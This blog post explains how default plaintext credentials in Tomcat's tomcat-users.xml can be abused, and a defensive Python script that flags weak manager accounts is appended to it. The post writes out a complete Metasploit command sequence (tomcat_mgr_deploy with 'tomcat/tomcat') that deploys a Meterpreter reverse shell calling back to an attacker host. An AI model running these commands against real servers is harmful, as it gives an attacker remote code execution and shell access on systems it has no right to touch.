Javier's Blog

Mostly computers and other tech stuff,...

Tuesday, January 17, 2012

Tomcat Exploitation with Metasploit

So if you have something like this in your tomcat/conf/tomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="manager"/>
</tomcat-users>


You can use msf to pwn it:
./msfconsole
use exploit/multi/http/tomcat_mgr_deploy
set PASSWORD tomcat
set USERNAME tomcat
set RHOST 1.1.1.1
set RPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 2.2.2.2
show options
set TARGET 1
exploit

This works on apache-tomcat-5.5.35 (confirmed) and 6.x, probably 7.x too. Moral of the story: don't use tomcat-users.xml to authenticate users, because you are saving a password in plain text and you are probably using an easily guessable password...
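
To check your own servers for the configuration shown above, here is an added example (not part of the original post) that parses a tomcat-users.xml and reports accounts holding a Manager role, flagging those with a guessable password. The password list, the sample file and the function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# "manager" is the role shown on this page; the manager-* names are the
# split Manager roles used by later Tomcat releases.
MANAGER_ROLES = {"manager", "manager-gui", "manager-script",
                 "manager-jmx", "manager-status"}
# Constructed short list of guessable passwords; extend with your own wordlist.
WEAK_PASSWORDS = {"", "tomcat", "admin", "manager", "password", "changeit"}

# Constructed sample: the entry from this page plus two made-up accounts.
SAMPLE = """<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="manager"/>
  <user username="deploy" password="Vq7#nL2x-constructed" roles="manager-script"/>
  <user username="guest" password="guest" roles="viewer"/>
</tomcat-users>"""


def audit_tomcat_users(xml_text):
    """Return (username, issue) findings for accounts that can reach the Manager app."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Ignore an XML namespace prefix on the tag, if the file declares one.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        granted = sorted(roles & MANAGER_ROLES)
        if not granted:
            continue  # not a Manager account, out of scope for this check
        findings.append((name, "manager role: " + ",".join(granted)))
        # Flag passwords that are on the list or equal to the username.
        if password.lower() in WEAK_PASSWORDS or password.lower() == name.lower():
            findings.append((name, "guessable password"))
    return findings


if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE):
        print(f"{user}: {issue}")
```

Every account it lists can reach the Manager application, so each one deserves a strong, unique password or removal if the Manager app is not needed.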